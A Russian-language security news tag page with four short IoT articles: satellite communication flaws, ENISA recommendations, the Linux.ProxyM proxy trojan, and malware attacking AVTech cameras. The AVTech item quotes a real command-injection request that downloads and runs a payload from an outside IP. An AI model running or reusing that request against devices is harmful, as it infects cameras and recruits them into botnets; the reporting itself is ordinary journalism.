Поиск
Показаны результаты для тегов 'iot-устройств'.
Найдено: 4 результата
-
Исследователи безопасности из компании IOActive сообщили о нескольких уязвимостях в системах спутниковой связи SATCOM, позволяющих удаленным злоумышленникам перехватить управление оборудованием на борту коммерческих самолетов, орбитальных станций и морских судов. «Сотни коммерческих самолетов от авиакомпаний, таких как Southwest, Norwegian и Icelandair, затронуты данными проблемами. Сегодня все еще можно найти суда, которые подключены к интернету, что делает их уязвимыми для атак», - отметили специалисты. Многие обнаруженные уязвимости представляют собой бэкдоры, небезопасные протоколы и проблемы с неправильной конфигурацией сети. По словам экспертов, в случае успешной эксплуатации проблем хакеры могут взломать оборудование на военной технике и раскрыть местоположение войск. Кроме того, изучив летную развлекательную систему одного из воздушных суден, исследователи выявили бэкдор на спутниковом модемном модуле самолета (MDU) и публичный IP, пытающийся подключиться к службе Telnet. «Модуль был связан со скомпрометированным маршрутизатором из Аргентины. Как выяснилось в ходе анализа, маршрутизатор был частью ботнета Gafgyt IoT», - отметили специалисты.
-
Агентство Европейского союза по сетям и информационной безопасности (ENISA) опубликовало рекомендации по защите устройств Интернета вещей (IoT) в контексте объектов критической инфраструктуры. По итогам текущего года общий объём IoT-рынка достигнет практически 20 млрд устройств. Рост по отношению к прошлому году составит приблизительно 17 %. В течение следующих четырёх лет количество IoT-устройств увеличится ещё на 10 млрд и составит около 30 млрд единиц. Не удивительно, что в такой ситуации всё острее встают вопросы обеспечения безопасности Интернета вещей. В разработке рекомендаций по обеспечению безопасности IoT-устройств приняли участие российские эксперты из «Лаборатории Касперского». Отмечается, что инциденты с IoT-устройствами входят в тройку угроз с наибольшим финансовым ущербом для компаний. Причём это относится к предприятиям любого размера — от небольших фирм до крупных корпораций. Представленные рекомендации адресованы регуляторам, а также производителям устройств и разработчикам программного обеспечения. Среди основных моментов можно выделить следующее: - сфокусироваться на специфичных для конкретного сектора рекомендациях вместо общих; - стандартизировать рекомендации внутри ЕС, установить единую терминологию и классификацию; - сотрудничать с представителями индустрии и вовлекать частный сектор в разработку законов, используя действующие ассоциации и объединения; - убедиться, что все сотрудники обладают актуальными знаниями и навыками в области кибербезопасности; - обеспечить совместимость данных с надёжной автоматизированной системой установки патчей; - провести аудит кода во время процесса внедрения. Это поможет уменьшить количество ошибок в конечной версии продукта, а также выявить любые попытки внедрения вредоносного кода или обхода аутентификации.
-
- обнародованы
- рекомендации
- (и ещё 3 )
-
Компания «Доктор Веб» раскрыла новую киберпреступную схему, реализованную с вовлечением устройств Интернета вещей (IoT). Речь идёт об использовании скомпрометированных элементов инфраструктуры IoT для организации атак. Для захвата контроля над устройствами Интернета вещей применяется вредоносная программа Linux.ProxyM. Этот зловред запускает на инфицированном устройстве SOCKS-прокси-сервер. С его помощью киберпреступники могут анонимно совершать различные деструктивные действия. Известны сборки трояна для устройств с архитектурой x86, MIPS, MIPSEL, PowerPC, ARM, Superh, Motorola 68000 и SPARC. Ранее киберпреступники использовали Linux.ProxyM для рассылки спама и фишинговых сообщений. Теперь же злоумышленники перешли к более активным действиям — массовым попыткам взлома веб-сайтов. В ходе атак на интернет-ресурсы применяются различные методы. Это, в частности, SQL-инъекции — внедрение в запрос к базе данных сайта вредоносного SQL-кода. Ещё один способ — XSS (Cross-Site Scripting), заключающийся в добавлении в страницу вредоносного сценария, который выполняется на компьютере при открытии этой страницы. Наконец, применяется метод (Local File Inclusion), который позволяет злоумышленникам удалённо читать файлы на атакуемом сервере с помощью сформированных специальным образом команд. Среди подвергшихся атакам ресурсов замечены игровые серверы, форумы, а также сайты другой тематической направленности, в том числе российские.
-
- киберпреступники
- взламывают
- (и ещё 3 )
-
Долгое время ОС на базе ядра Linux остаются приоритетными у производителей устройств «Интернета вещей» (IoT). В связи с этим для Linux появляются все новые и новые угрозы. В прошлом году большую известность приобрело вредоносное ПО Mirai, инфицирующее IoT-устройства и включающее их в ботнет. Исследователи Trend Micro сообщили о новом образце вредоносного ПО для Linux под названием ELF_IMEIJ.A (по классификации Trend Micro). Вредонос эксплуатирует известные уязвимости в системах безопасности производства крупной тайваньской компании AVTech. Проблемы были обнаружены экспертами Search-Lab. Исследователи пытаются связаться с производителем еще с октября 2016 года, однако безуспешно. Уязвимости в устройствах AVTech позволяют выполнить удаленный файл на стороне атакуемого сервера с помощью скриптов cgi-bin. С целью проэксплуатировать уязвимость злоумышленник отправляет на произвольный IP-адрес запрос POST /cgi-bin/supervisor/CloudSetup.cgi?exefile=wget -O /tmp/Arm1 http:// 192.154.108.2:8080/Arm1;chmod 0777 /tmp/Arm1;/tmp/Arm1; HTTP/1.1. С помощью уязвимости хакер может внедрить команду и запустить процесс загрузки на устройство вредоносного ПО. Точкой входа для ELF_IMEIJ.A служат IP-камеры, системы видеонаблюдения и сетевые записывающие устройства производства AVTech. Попав на устройство, вредонос собирает данные о системе и сетевой активности. ПО также способно получать от киберпреступников команды и выполнять их, например, для запуска DDoS-атаки или самоуничтожения. Устройства, находящиеся в одной сети с зараженным, также подвергаются опасности.
-
- iot-устройств
- вредоносное
-
(и ещё 3 )
C тегом: